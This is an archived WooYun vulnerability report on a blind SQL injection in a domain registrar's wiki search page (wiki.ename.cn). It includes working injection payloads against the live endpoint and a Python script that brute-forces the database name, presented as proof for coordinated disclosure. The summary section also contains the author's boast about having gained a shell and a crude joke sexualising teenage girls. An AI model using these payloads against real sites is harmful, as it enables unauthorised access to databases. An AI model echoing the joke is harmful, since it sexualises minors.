WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0198928

漏洞标题：域名商安全之易名中国某站SQL注入（附验证脚本）

相关厂商：易名中国

漏洞作者： 路人甲

提交时间：2016-04-21 16:15

修复时间：2016-06-06 09:20

公开时间：2016-06-06 09:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2016-04-21： 细节已通知厂商并且等待厂商处理中
2016-04-22： 厂商已经确认，细节仅向厂商公开
2016-05-02： 细节向核心白帽子及相关领域专家公开
2016-05-12： 细节向普通白帽子公开
2016-05-22： 细节向实习白帽子公开
2016-06-06： 细节向公众公开

简要描述：

本来shell了，你们居然下线了那个域名，我X！
日本地震了 ，大家一副事不关己的样子 说句实话 着实令人心寒 本人出于人道主义，愿意收留1~5名日本孤儿，要求:女，15—19岁，身无划痕，身材黄金比例S，脸蛋洁白，萝莉优先…大爱无疆，人间有真情！再苦不能苦灾民！传递正能量，如果没有。那我等等在问一遍

详细说明：

返回错误
http://wiki.ename.cn/doc/search
data : keyword=1") RLIKE (SELECT (CASE WHEN (substring(database(),1,1)='x') THEN "1" ELSE 0x28 END)) AND ("oElH"="oElH

返回正确
http://wiki.ename.cn/doc/search
data : keyword=1") RLIKE (SELECT (CASE WHEN (substring(database(),1,1)='e') THEN "1" ELSE 0x28 END)) AND ("oElH"="oElH

漏洞证明：

当前数据库名称为：ename_wiki

#-*- coding:utf-8 -*-
import requests
payload = list('einam_wk') #别问我怎么知道payload就这点...因为我跑了之后精简的
url = 'http://wiki.ename.cn/doc/search'
headers = {
	'Content-Type':'application/x-www-form-urlencoded',
	'Host':'wiki.ename.cn',
	'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko)'
}
database = ''
for x in range(1,11):
	for y in payload:
		
		data = 'keyword=1") RLIKE (SELECT (CASE WHEN (substring(database(),%d,1)="%s") THEN "1" ELSE 0x28 END)) AND ("oElH"="oElH' % (x,y)
		try:
			response = requests.post(url,data=data,headers=headers,verify=False,timeout=2)
			if(len(response.content) > 20000):
				print u'[Tangscan] 数据库第'+repr(x)+u'位是'+y
				database += y
		except Exception,e:
			pass
print database

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

漏洞评价：

评价